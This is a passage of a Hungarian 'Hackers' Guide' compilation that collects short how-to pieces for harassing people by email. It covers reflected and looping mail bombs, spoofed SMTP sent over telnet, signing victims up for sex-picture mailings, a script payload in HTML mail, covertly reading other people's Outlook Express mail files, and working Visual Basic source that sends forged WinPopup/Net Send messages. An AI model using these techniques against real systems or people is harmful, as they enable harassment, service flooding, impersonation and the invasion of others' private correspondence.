Sz'al attak.com telnetel sux.com-ra a 25-os portra es kuld egy par ezer mailt<br />

friendofsux.com-ra ami from:suckah@sux.com. Majd bekapcsolja a confirmation<br />

when arrived-ot. Tulajdonkeppen ennyi. Es a poen:<br />

Megerkezik friendofsux.com-ra a parszazezer uzenet, es friendofsux.com<br />

automatikusan kuldozgeti vissza sux.com-ra a confirmationokat hogy az uzenetek<br />

nagyon is jol megerkeztek:)))) Sz'al a ket rencer csak annyit fog realizalni hogy a<br />

masik bombazza ot, igy szepen egymasra uszitottuk oket vagy egyszeruen csak<br />

mexivattunk 2 rencert!:) Es ha ugyesek vagyunk akkor nem lesz ott az extended<br />

headerben hogy Origin:evil@attak.com, de ezt asszem mar ugyis tudjatok hogy hogy<br />

oldjuk meg nem en fogom leirni;)<br />

Ha nem vilagos leirom pontokban:<br />

1:<br />

user@attak.com:bash$ telnet sux.com 25<br />

--> spoofed mail kuldese (csak ugyesen, azert sem irom le hogy kell)<br />

--> spoofed hostrol celszeru telnetelni,<br />

--> az emailnek friendofsux.com-rol kell erkeznie,<br />

--> confirm when arrived = kulcsmozzanat<br />

2: vissza az 1-es ponthoz egy par ezerszer. Esetleg scriptet is lehet irni.<br />

3: Nezzuk szep tag szemekkel amint friendofsux.com rencergizdaja telefonalgat<br />

sux.com rencergizdajanak hogy mi a faszt kepzel az hogy emailbombazza ot es<br />

nagyon duhos. Ekkor sux.com megnezi hogy mi nincs rendben es realizalja, hogy<br />

tulajdonkeppen friendofsux.com vagy visszaadta az emailbombazast vagy nem<br />

realizalja csak azt latja hogy van egy par ezer uzenet es hogy irto lassu a login<br />

program:)) Egy legy ket csapasra, sot meg durvabb.<br />

Nade nem vagytok ti hulyek remelem ugyhogy nem is kell hogy tovabb reszletezzem<br />

biztos leesett a lenyeg, ugyhogy inkabb abba is hagyom. Ha nem veszitek komolyan<br />

akkor is jo poen szerintem:)) minimum rohogni lehet rajta.<br />

220


Hackers’ Guide<br />

Engem IRCNET-en a #danubius csatin lehet megtalalni de nem rewter nick alatt:<br />

publicba kezdd el keresni rewtert es egy ido utan megtalalod foleg kora estefele...;))))<br />

ReWtER<br />

E-mail: rewter@hotmail.com<br />

************************************************************************************************<br />

Levélbomba<br />

Először a levélbomba fogalma. A levélbomba annyit tesz, hogy egy megszerzett email<br />

címre akár több ezer haszontalan levelet küld v.ki. Pl. egy hircsoportban , IRC-n<br />

ICQ-n vagy sima emilben kellemetlenkedők ellen használják. A jobb progik pl:<br />

Kaboom3.0 (ez a legjobb levélbombázó) mindik változtatja a feladót a témát a<br />

levéltestet, így semmijen szűrővel nem lehet megállítani. Marad a kézi átnézés, vagy<br />

egész érkezett levelek kidobása persze a "JÓ" levelek elvesznek. Ráadásul a<br />

kaboom 3.x ennél is többet tud. Akár levelezőlistára is feliratja az áldozatot úgy, hogy<br />

nem tudja lemondani. (igazábol ő nincs feliratva csak egy másik cím ami neki<br />

továbbküldi (forwardolja)a levelet). A kaboom felsorol egy párat az amerikai buzis<br />

leszbikus listákbol csak beikszelni kell és megadni az áldozat emil címét.<br />

Legtöbbször a levelek az internetes kapcsolat alatt mennek ki. A Kaboom pl: sok<br />

klónt hoz létre és különböző levelező progiként tárgyal a szerverrel. Sőt olyan is van<br />

amelyik a szerver válaszát figyelemre se méltatva küldi a levelket. DE KÉTSZER IS<br />

GONDOLD MEG MIELŐTT ILYET CSINÁLSZ KÉRLEK!! Mert ha nem vagy<br />

elégóvatos rájöhetnek hogy te voltál. pl:ip cím stb.. Ha dtatic ip-d van (mindig<br />

ugyanaz) akkor könnyű a dolga az illetőnek, esetleg a szolgáltató letiltja a saját emil<br />

címedet ha bejelentést tesz.<br />

Dani12<br />

************************************************************************************************<br />

"Végtelenített" E-MAIL<br />

221


Hackers’ Guide<br />

Elôszôr is szükségünk lesz egy levelezôlistára. Ilyet bárki készíthet ingyen a<br />

WWW.LIST.TO címen. Miután átestünk néhány formaságon, ki kell választanunk<br />

néhány személyt, akit szeretnénk feliratni a listára. Ide majd két címet kell beírnunk -<br />

ezeket idôközben a WWW.INAME.COM-on tudjuk létrehozni. Ez utóbbi lapon E-<br />

MAIL továbbítást kérhetünk, azaz ha az ottani címre megérkezik egy levél, akkor azt<br />

autómatikusan továbbküldi a megadott helyre. Az elsô címen a lista címére kérjünk<br />

továbbítást (listaneve@list.to), a másodikon pedig a megbombázandó illetô E-MAILére.<br />

Az elöbbi azért kell, mert a listserver nem biztos hogy jónéven venné ha saját<br />

magának kellene leveleket küldözgetnie (persze lehet hogy nincs ezellen védve...),<br />

az utóbbi pedig azért, hogy az áldozat ne tudja lemondani a levelezôlistát - hiszen a<br />

listára tulajdonképpen ô nincsen feliratva, csupán egy másik cím, ami hozzá<br />

továbbítja a leveleket. Ettôl még persze egy hozzáértôbb illetô le tudja a listát<br />

mondani, de már addig is igen jelentôs számú levelet kap... Ezzel tehát meg is<br />

volnánk. Mi fog történni? Amint a lista elkészül, értesítést kapnak a feliratottak a<br />

létrejöttérôl. Ezt megkapja az áldozat, továbbá megkapja a másik cím is, ami<br />

továbbítja a neki megadott címre. Ez a cím történetesen a levelezôlistáé, aki kiküldi<br />

ezt is a megbombázottnak, s értesíti a rá forwardoló címet arról, hogy megkapta az<br />

üzenetet. Ez a levél utána ismét eljut hozzá, ô kiküldi az illetékeseknek, s megintcsak<br />

küld egy leigazolást - tulajdonképpen saját magának. Ezzel egy végtelen lavinát<br />

indítottunk el, aminek csak a server gazdája szabhat gátat... Gyakorlatilag - a lassú<br />

sebesség miatt - úgy fest a helyzet, hogy 10 percenként kap egy E-MAIL-t a károsult<br />

- kivéve abban az (igen valószínű)esetben, ha a servernek nem tetszik a művünk,<br />

és...<br />

************************************************************************************************<br />

A legegyszerûbb módszer levélbombázáshoz<br />

Ez az egészet, nem azért írom le, hogy másoknak fegyvert adjak a kezébe, hanem<br />

azért, hogy felhívjam a figyelmet az egyes levelezorendszerekben lévo bugokra...<br />

Összedobta: Nestan<br />

1. Egészrol röviden, tömören...<br />

Szóval erre az egészre nem én jöttem rá, hanem az egyik barátom, aki felhívta rá a<br />

figyelmemet. Az egész szituáció onnan kezdodik, hogy adva vagyon egy lassú<br />

internet hozzáférés(a'la Elender) és szeretnénk a beregisztrált Freemail-es<br />

postafiókunkból webes felületen keresztül levelet küldeni valakinek. Ha arra a<br />

'KÜLDÉS' gombra többször és többször, egymás után rákattintunk megállás nélkül<br />

illetve a felso 'TO/CÍMZETT' illetve 'CC' mezokbe ugyanazt az e-mail címet beírjuk,<br />

akkor az illeto annyiszor 2 példányt kap, ahányszor rákattintottunk a 'KÜLDÉS'<br />

222


Hackers’ Guide<br />

gombra... Tehát ennyi... Ez a legegyszerubb, amihez free SMTP szervereket illetve<br />

hasonló mások számára bonyolult beállítást nem kell eszközölni...<br />

************************************************************************************************<br />

A Freemailrol ugy altalaban<br />

FreeMail.hu-ról úgy általában<br />

Egyik nap éppen otthon voltam betegen :[ , amikor a www.freemail.hu ingyenes<br />

levelezõ rendszer FaQ-jét olvasgattam...<br />

Elsõre ez szúrt szemet:<br />

"Központi spam szûrés<br />

A beérkezõ tömeges, kéretlen leveleket igyekszünk automatikusan kiszûrni az erre a<br />

célra létrejött, az ilyen levelek feladóit és továbbítóit szûrõ rendszerekhez<br />

csatlakozva."<br />

hát ez sux! :[ de ne csüggedjetek! ;] (modjuk a mailbombot en ugyanugy tuttam<br />

hasznalni, mint regebben, na de mindegy!)...<br />

Mondjuk van egy uj modszer bombazasra! :] (csak egy telnet app és a haverod eamil<br />

cime kell!) Ezt is a FaQ-ban talaltam:<br />

"Hol találom meg ennek a FAQ-nak a legfrissebb verzióját?<br />

Email-ben lekérhetõ egy a freemail-faq@c3.hu címre küldött tetszõleges tartalmú<br />

levéllel. (A szerver ezt követõen automatikusan elküldi a feladó címére a szöveget.)"<br />

ugye kapizsgáljátok! :] ha nem az sem baj leírom: szóval remélem mindenki tud<br />

anonymmailt küldeni telnettel... (ha nem olvassatok utana, most nem írom le). Szóval<br />

a feladóhoz a célpont mail címét írod, és már kapja is a szép méretû filét, ezt csinald<br />

meg kb 10x és kellemes lessz! Bátrabbaknak: küldjél mailbombot a a faq címere a<br />

célpontod címével ellátva! :]<br />

Aztán mégvalami! (ez a legjobb :]):<br />

"Új olvasó felület<br />

Ezentúl összetett, például HTML kódolást tartalmazó levelek is megjeleníthetõk a<br />

webes felületen, azaz látszanak a színek, kiemelések, a szövegben elhelyezett<br />

képek. A levélben szereplõ email címek és URL-ek klikkelhetõek lettek. Javítottuk az<br />

attachmentek kezelését is."<br />

ql, aki olvasta az internettorol szolo cikkem az szerintem már kezdi is irni a levelet ;] ,<br />

na, de aki nem annaki itt a meglepetés...<br />

223


Hackers’ Guide<br />

Szoval, ha a levélbe fogod és beirsz egy ilyen sort: Hi Akkor ez szép pirosan fog megjelenni! Nos ez alapban semmi,<br />

de igy a java-s cuccok is lefutnak :]<br />

Mondjuk ezt írod a levéltõrzsbe:<br />

setTimeout("top.location.href =<br />

'/con/con'",100);<br />

nos ugye javaban mindenki otthon van?? ;]<br />

Megjegyzés: ez csak akkor mükszik, ha a haverod a webes felületrõl vagy olyan<br />

levprogival nézi a leveleit ami futtatja a html kodot!<br />

Hát ennyi mára tényleg ne szivassátok a freemail levlistáit csak a haverjaitokat ;]<br />

bY: DomIni$<br />

mailto: root@rulezlinux.com<br />

www.rulezlinux.com<br />

#silver<br />

************************************************************************************************<br />

Szex kepek e-mailre<br />

Mint tudjuk a www.extra.hu cimen ha regisztraltatjuk magunkat, akkor egy olyan email<br />

cimet kapunk, ami a megadott cimre forwardolja a a leveleket. Ugye ide<br />

barmilyen cim beirhato, senki nem fogja ellenorizni. Tehat ide barki cimet beirhatjuk,<br />

es akkor az az illeto fogja kapni a leveleket, akinek a cimet beirtuk. Tehat ha az<br />

extras cimet feliratjuk nehany listara, vagy valahova mashova, akkor tenylegesen az<br />

extra cimre fogjak kuldeni a leveleket, amit mi hoztunk letre, de vki mas kapja meg.<br />

Es a feliratott egyen nem fog rola tudomast szerezni. De persze ezt el lehet jatszani<br />

mas e-mail tovabbitoval is. Csak gondoltam ez magyar, marmint az extra, es aranyait<br />

veve egesz gyors.<br />

Na szoval a lenyegre terve.<br />

Vannak a neten olyan cimek, ahonnan e-mailre szex kepeket lehet kerni. Eloszor<br />

amikor ez extranal regisztraltatod magad, akkor egy sajat e-mailt adj meg. Majd nezz<br />

el a www.sexfiles.com vagy a www.free-sex-pics.cx cimre es irsad fel magad. Majd<br />

ezutan ezek kuldenek neked egy levelet, a szokasos szoveggel, hogy amennyiben te<br />

irattad fel magad, kuld vissza a levelet egy bizonyos idon belul. Ezutan ezt<br />

visszakuldod, es a kovetkezo lepesben az extraban megvaltoztatod az e-mail cimet.<br />

Tehat egy olyan cimet irsz be, akinek meglepit akarsz okozni ezzel. Es hogy mi fog<br />

tortenni? Naponta 10 db szex kepet fog kapni a postafiokjaba. Es ugye mivel egy<br />

leveltovabbitoval van dolga, nem egyszeru ezt lemondani.<br />

Egy darabig talan jo bulinak tunik, de mikor mar egy fel eve minden nap kap az<br />

224


ember kepeket, egy kicsit idegesito lehet, foleg ha nem is ingyenes e-mail<br />

szolgaltatonal van ez a cim. >:-)<br />

Hackers’ Guide<br />

Cyberfly<br />

************************************************************************************************<br />

Levélbomba törlése<br />

Telnetelj be a mail szolgáltatód serverére a 110-es porton! Ezután azonosítsd<br />

magad:<br />

USER [felhasználóneved]<br />

PASS [jelszavad]<br />

Ezután a DELE [levél száma] parancs segítségével törölheted a leveleket letöltésük<br />

nélkül.<br />

************************************************************************************************<br />

Outlook Express levelek<br />

Elfelejtetted az OutLook Express jelszavad? El akarod olvasni mások leveleit, de<br />

nem tudod a jelszavukat? A megoldás nagyon egyszeru, hiába kér az OE jelszót a<br />

profilhoz, a leveleket mégis kódolatlanul tárolja a<br />

c:\ windows\ Applications Data\ Identities\ {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\<br />

Microsoft\ Outlook Express<br />

vagy ha "több felhasználós" windowsod van, akkor a<br />

c:\ windows\ Profile\ username\ Applications Data\ Identities\ {xxxxxxxx-xxxx-xxxxxxxx-xxxxxxxxxxxx}\<br />

Microsoft\ Outlook Express<br />

mappában, szintén valami spéci formában, *.dbx fájlokban.<br />

Van pár ilyen mappa, legegyszerübben úgy lehet megtalálni az igazit, hogy<br />

belekukkantasz a *.dbx fájlokba, és rákeresel egyszerubb szavakra (pl. Szia, Bye,<br />

Uvd, vagy az illeto neve, e-mail címe), mert a leveleket sima szövegként tárolja a<br />

OE, kiegészítve valami bináris formában lévo egyéb adatokkal.<br />

Ha a beállításoknál a tömörítés opció be van kapcsolva - és az OE tényleg betömöríti<br />

a leveleket - akkor az elozo módszer értelmét veszti.<br />

225


Hackers’ Guide<br />

Ezekek a fájlokat egy egyszeru szövegszerkesztovel is meg lehet nézni, de a levelek<br />

elolvasásához simán fel lehet használni az Outlook-ot is, csak létre kell hozni egy új<br />

profilt, és átállítani a régi mappára az<br />

eszközök/Beállítsáok/Karbantartás/Tárolómappa fülön a könyvtárat, majd újraindítani<br />

az OE-t. Aztán, ha beállítasz rá egy jelszót, akkor észrevétlenül nyomon követheted<br />

mások levelezését, illetve sajátodat ott folytathatod, ahol abbahagytad.<br />

Sun-Zero<br />

sun-zero@freemail.hu<br />

************************************************************************************************<br />

Outlook Express 5 bug<br />

Ez a cikk fordítás, az eredeti cikket írta: cube -cube@boxnetwork.net<br />

Windows alatt az Outlook Express 5.x engedélyezi az utólag megnyitott üzenetek<br />

olvasását miután egy másik üzenet meg lett nyitva. Egy speciális levél küldése által a<br />

távoli támadó lekérdezheti az aktuálisan megnyitott üzeneteidet, ezzel fontos<br />

információkat megszerezve. A probléma megállapítani az e-mail tárgyát, ami változó<br />

egy újonnan megnyitott ablakban. Ezen a változón keresztül valószínuleg hozzá<br />

tudsz férni az összes megnyitott üzenethez.<br />

Az exploit:out-exp.htm.txt<br />

Scalpal<br />

************************************************************************************************<br />

WinPopup és NetSend üzenetek álcázása<br />

Az anyag fordítás, eredeti cím/szerzo: "Hack-FAQ " /Wang/<br />

FordÍtotta: Sun-Zero /sun-zero@freemail.hu/<br />

Ha van hozzáférésed egy LAN-hoz (Local Area Network - helyi hálózat) a<br />

munkahelyeden, vagy iskolában, kollégiumban, akkor a windows 95/98-as gépeken<br />

igen valószínü hogy winpopuppal üzengetnek a hálózaton. Ha a LAN, amihez<br />

hozzáfér használ windows NT-s gépeket akkor valószínuleg a winpopuppal<br />

egyenértéku program a Net Send vagy Messenger szolgáltatás.<br />

226


Hackers’ Guide<br />

A winpopup és a netsend, egyaránt üzenetközvetíto szolgáltatás a hálózatokon.<br />

Az a gondolat aljas, hogy képes vagy belépni más login nevén vagy számítógépén<br />

és ezután (feltéve hogy nekik is szintén nyitva van a program) küldsz másoknak<br />

olyan rövid üzenetet, amilyet akarsz, és utána az látszik a képernyojükön.<br />

Alapjábavéve, nevetséges, amikor oda-vissza küldözgetünk hülye üzeneteket a<br />

barátainknak.<br />

Amikor az üzenet megérkezik, akkor a géped neve látszik a feladónál. Ha te üzenetet<br />

küldesz hackelésrol, vagy más veszélyes témáról igen valószínü hogy a<br />

rendszergazda késobb megnézi, vagy szorgalmasan figyeli az üzeneteket. Ezért<br />

lenne jó tudni hogy hogyan lehet hamis üzenetet küldeni, hogy úgy látszódjon, hogy<br />

mástól származik, vagy a "feladó" nem is létezik.<br />

Mindketto, a winpopup.exe (többnyire a c:\windows könyvtárban van) és a Net Send<br />

(nem biztos a helye NT alatt - keresd meg, nyilvánvalóan a "NET SEND<br />

számítógépnév üzenet" paranccsal muködik) is ugyanolyan a protokollt használ -<br />

"Mailslots"-t.<br />

Itt van egy Visual Basic forráskód az üzenetek hamisításához. Neked kell csinálni<br />

egy form-ot (Form1) amiben benne vannak a következok:<br />

• Text box called "Text1"<br />

• Text box called "Text2"<br />

• Text box called "Text3"<br />

• Command Button called "Command1"<br />

Const MAILSLOT_WAIT_FOREVER = (-1)<br />

Const OPEN_EXISTING = 3<br />

Const GENERIC_READ = &H80000000<br />

Const GENERIC_WRITE = &H40000000<br />

Const GENERIC_EXECUTE = &H20000000<br />

Const GENERIC_ALL = &H10000000<br />

Const INVALID_HANDLE_VALUE = -1<br />

Const FILE_SHARE_READ = &H1<br />

Const FILE_SHARE_WRITE = &H2<br />

Const FILE_ATTRIBUTE_NORMAL = &H80<br />

Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As<br />

Long<br />

Private Declare Function WriteFile Lib "kernel32" (ByVal hFileName As Long, ByVal<br />

lpBuff As Any, ByVal nNrBytesToWrite As Long, lpNrOfBytesWritten As Long, ByVal<br />

lpOverlapped As Long) As Long<br />

Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal<br />

lpFileName As String, ByVal dwAccess As Long, ByVal dwShare As Long, ByVal<br />

lpSecurityAttrib As Long, ByVal dwCreationDisp As Long, ByVal dwAttributes As<br />

Long, ByVal hTemplateFile As Long) As Long<br />

Private Sub Command1_Click()<br />

SendMsg(Text1.Text, Text2.Text, Text3.Text)<br />

227


Hackers’ Guide<br />

End Sub<br />

Function SendMsg(From As String, To As String, Text As String) As Long<br />

Dim rc As Long<br />

Dim mshandle As Long<br />

Dim msgtxt As String<br />

Dim byteswritten As Long<br />

Dim mailslotname As String<br />

' name of the mailslot<br />

mailslotname = "\\" + To + "\mailslot\messngr"<br />

msgtxt = From + Chr(0) + To + Chr(0) + Text + Chr(0)<br />

mshandle = CreateFile(mailslotname, GENERIC_WRITE, FILE_SHARE_READ, 0,<br />

OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, -1)<br />

rc = WriteFile(mshandle, msgtxt, Len(msgtxt), byteswritten, 0)<br />

rc = CloseHandle(mshandle)<br />

End Function<br />

'----------------------------- END OF CODE -------------------------------------<br />

A program használata:<br />

• Fordítsd le .exe-nek<br />

• Futtasd<br />

• "Text1" helyére írd be az üzenet feladóját, ide bármit beírhatsz.<br />

• "Text2" helyére írd be az üzenet címzettjét (bármelyik számítógép neve, vagy<br />

bármelyik login név)<br />

• "Text3" helyére írd be az üzenetet<br />

• Nyomd meg a Command1 gombot az üzenet elküldéséhez.<br />

Biztos vagyok benne, el tudsz gondolkodni a program saját használatodra való<br />

fordításához. (Ugyanis a programban van egy-két kisebb hiba - Sun-Zero)<br />

End of Volume #1<br />

228

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!